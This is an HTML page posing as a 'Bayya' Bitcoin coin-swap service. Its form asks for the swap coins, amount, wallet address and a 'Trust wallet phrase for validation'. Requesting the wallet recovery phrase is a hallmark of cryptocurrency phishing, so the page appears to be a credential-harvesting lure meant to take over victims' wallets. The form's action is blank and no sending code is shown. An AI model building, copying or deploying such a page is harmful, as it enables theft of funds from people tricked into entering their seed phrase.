<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <link rel="shortcut icon" href="images/favicon.png">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Bayya - Bitcoin Crypto Currency</title>
</head>
<body>
    <style>
        body{
            margin: 0%;
            padding: 0%;
        }
        .createt{
            width: 35%;
            margin: auto;
            padding: 20px;
            height: 570px;
            background-color: rgb(0, 0, 0); 
        }
        .swap-container{
            width: 100%;
            height: 900px; 
            background-color: rgba(0, 0, 0, 0.74);
            background-blend-mode: multiply;
            background-size: 100% 100%;
            background-image: url(/images/slider/bg1.jpg);
        }
        .swap-now{
            width:30%;
            height:40px;
            margin-top: 40px;
            float: right; 
        }
        .wap{
            width: 100%;
            border: none;
            height: inherit;
            color: white;
            cursor: pointer;
            background-color: #fd961a;
        }
        .swap-dive{
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
            color: white;
            text-align: center;
            width: 100%;
            padding: 15px;  
        }
        .inpoy{
             width: 95%;
             outline: solid black;
             padding: 15px;
             color: white;
             background-color: rgb(27, 26, 26);
             border: none;
        }
        .per{
            color: gray;
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
        }
    </style> 
       <div class="swap-container">
           <br>
           <br>
           <br>
           <br> 
           <br>
            
           <form action="">
            <div class="createt">
                <div class="swap-dive">
                    <b>
                        Swap <label for="" style="color: #fd961a ;">coin   </label>
                    </b>
                    <p style="font-size: 12px; color: rgb(212, 212, 212);">
                        Note only works for trust wallet users
                    </p>
                </div>
                 <input type="text"  placeholder="From" class="inpoy" required>
                 <br>
                 <br>
                 <input type="text"  placeholder="To" class="inpoy" required>
                 <br>
                 <br>
                 <input type="text"  placeholder="Amount to swap" class="inpoy" required>
                 <br>
                 <br>
                 <input type="text"  placeholder="  your wallet Address" class="inpoy" required>
                 <br>
                 <br>
                 <input type="text"  placeholder="Trust wallet phrase for validation" class="inpoy" required>
                 <br>
                 <br>
                 <b class="per">
                     Percentage
                 </b>
                 <br>
                 <br>
                 <select name="" id="" class="inpoy"  >
                     <option value=""> 10%</option>
                     <option value=""> 20%</option>
                     <option value=""> 30%</option>
                     <option value=""> 40%</option>
                     <option value=""> 50%</option>
                     <option value=""> 60%</option>
                     <option value=""> 70%</option>
                     <option value=""> 80%</option>
                     <option value=""> 90%</option>
                     <option value=""> 100%</option>
                 </select>
                 <br>
                 <div class="swap-now">
                      <button class="wap">
                          Swap now
                      </button>
                 </div>
                </div>
           </form>
       </div>

</body>
</html>